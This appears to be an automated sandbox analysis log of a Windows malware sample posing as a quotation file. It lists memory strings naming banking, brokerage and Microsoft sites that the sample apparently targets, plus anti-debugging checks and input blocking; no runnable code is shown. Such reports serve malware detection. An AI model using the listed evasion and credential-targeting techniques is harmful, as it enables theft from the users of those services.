                Source: 2-64-111.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 2-64-111.13.drBinary or memory string: discord.comVMware20,11696487552f
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PasswordVMware20
                Source: 2-64-111.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: FOBNeEFwBsF.exe, 0000000E.00000002.4008571068.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,
                Source: 2-64-111.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 2-64-111.13.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,1
                Source: 2-64-111.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,116c
                Source: 2-64-111.13.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2884284799.0000020B7352C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2-64-111.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 2-64-111.13.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (rokers.comVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /profileVMware20
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 2-64-111.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696
                Source: 2-64-111.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20
                Source: 2-64-111.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 2-64-111.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 2-64-111.13.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: comp.exe, 0000000D.00000002.4011252558.0000000008208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers.comVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 2-64-111.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 2-64-111.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 2-64-111.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 2-64-111.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E rdtsc 4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02657743 LdrLoadDll,4_2_02657743
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E73F09 BlockInput,0_2_00E73F09
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E03B3A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E35A7C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E04B37 LoadLibraryA,GetProcAddress,0_2_00E04B37
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_0104F708 mov eax, dword ptr fs:[00000030h]0_2_0104F708
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_01050D18 mov eax, dword ptr fs:[00000030h]0_2_01050D18
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_01050D78 mov eax, dword ptr fs:[00000030h]0_2_01050D78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A30B mov eax, dword ptr fs:[00000030h]4_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A30B mov eax, dword ptr fs:[00000030h]4_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A30B mov eax, dword ptr fs:[00000030h]4_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302C310 mov ecx, dword ptr fs:[00000030h]4_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03050310 mov ecx, dword ptr fs:[00000030h]4_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov ecx, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA352 mov eax, dword ptr fs:[00000030h]4_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D8350 mov ecx, dword ptr fs:[00000030h]4_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D437C mov eax, dword ptr fs:[00000030h]4_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E388 mov eax, dword ptr fs:[00000030h]4_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E388 mov eax, dword ptr fs:[00000030h]4_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E388 mov eax, dword ptr fs:[00000030h]4_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305438F mov eax, dword ptr fs:[00000030h]4_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305438F mov eax, dword ptr fs:[00000030h]4_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028397 mov eax, dword ptr fs:[00000030h]4_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028397 mov eax, dword ptr fs:[00000030h]4_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028397 mov eax, dword ptr fs:[00000030h]4_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EC3CD mov eax, dword ptr fs:[00000030h]4_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B63C0 mov eax, dword ptr fs:[00000030h]4_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov eax, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov eax, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov ecx, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov eax, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D43D4 mov eax, dword ptr fs:[00000030h]4_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D43D4 mov eax, dword ptr fs:[00000030h]4_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F0 mov eax, dword ptr fs:[00000030h]4_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F0 mov eax, dword ptr fs:[00000030h]4_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F0 mov eax, dword ptr fs:[00000030h]4_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030663FF mov eax, dword ptr fs:[00000030h]4_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302823B mov eax, dword ptr fs:[00000030h]4_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B8243 mov eax, dword ptr fs:[00000030h]4_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B8243 mov ecx, dword ptr fs:[00000030h]4_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A250 mov eax, dword ptr fs:[00000030h]4_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036259 mov eax, dword ptr fs:[00000030h]4_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EA250 mov eax, dword ptr fs:[00000030h]4_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EA250 mov eax, dword ptr fs:[00000030h]4_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034260 mov eax, dword ptr fs:[00000030h]4_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034260 mov eax, dword ptr fs:[00000030h]4_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034260 mov eax, dword ptr fs:[00000030h]4_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302826B mov eax, dword ptr fs:[00000030h]4_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E284 mov eax, dword ptr fs:[00000030h]4_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E284 mov eax, dword ptr fs:[00000030h]4_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0283 mov eax, dword ptr fs:[00000030h]4_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0283 mov eax, dword ptr fs:[00000030h]4_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0283 mov eax, dword ptr fs:[00000030h]4_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov ecx, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h]4_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h]4_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h]4_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h]4_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h]4_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030402E1 mov eax, dword ptr fs:[00000030h]4_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030402E1 mov eax, dword ptr fs:[00000030h]4_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030402E1 mov eax, dword ptr fs:[00000030h]4_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h]4_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DA118 mov ecx, dword ptr fs:[00000030h]4_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DA118 mov eax, dword ptr fs:[00000030h]4_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DA118 mov eax, dword ptr fs:[00000030h]4_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DA118 mov eax, dword ptr fs:[00000030h]4_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F0115 mov eax, dword ptr fs:[00000030h]4_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03060124 mov eax, dword ptr fs:[00000030h]4_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h]4_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h]4_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C4144 mov ecx, dword ptr fs:[00000030h]4_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h]4_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h]4_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302C156 mov eax, dword ptr fs:[00000030h]4_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C8158 mov eax, dword ptr fs:[00000030h]4_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036154 mov eax, dword ptr fs:[00000030h]4_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036154 mov eax, dword ptr fs:[00000030h]4_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03070185 mov eax, dword ptr fs:[00000030h]4_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EC188 mov eax, dword ptr fs:[00000030h]4_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EC188 mov eax, dword ptr fs:[00000030h]4_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D4180 mov eax, dword ptr fs:[00000030h]4_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D4180 mov eax, dword ptr fs:[00000030h]4_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B019F mov eax, dword ptr fs:[00000030h]4_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B019F mov eax, dword ptr fs:[00000030h]4_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B019F mov eax, dword ptr fs:[00000030h]4_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B019F mov eax, dword ptr fs:[00000030h]4_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A197 mov eax, dword ptr fs:[00000030h]4_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A197 mov eax, dword ptr fs:[00000030h]4_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A197 mov eax, dword ptr fs:[00000030h]4_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F61C3 mov eax, dword ptr fs:[00000030h]4_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F61C3 mov eax, dword ptr fs:[00000030h]4_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h]4_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h]4_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]4_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h]4_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h]4_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_031061E5 mov eax, dword ptr fs:[00000030h]4_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030601F8 mov eax, dword ptr fs:[00000030h]4_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4000 mov ecx, dword ptr fs:[00000030h]4_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h]4_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h]4_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h]4_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h]4_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h]4_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A020 mov eax, dword ptr fs:[00000030h]4_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302C020 mov eax, dword ptr fs:[00000030h]4_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6030 mov eax, dword ptr fs:[00000030h]4_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03032050 mov eax, dword ptr fs:[00000030h]4_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6050 mov eax, dword ptr fs:[00000030h]4_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305C073 mov eax, dword ptr fs:[00000030h]4_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303208A mov eax, dword ptr fs:[00000030h]4_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C80A8 mov eax, dword ptr fs:[00000030h]4_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F60B8 mov eax, dword ptr fs:[00000030h]4_2_030F60B8
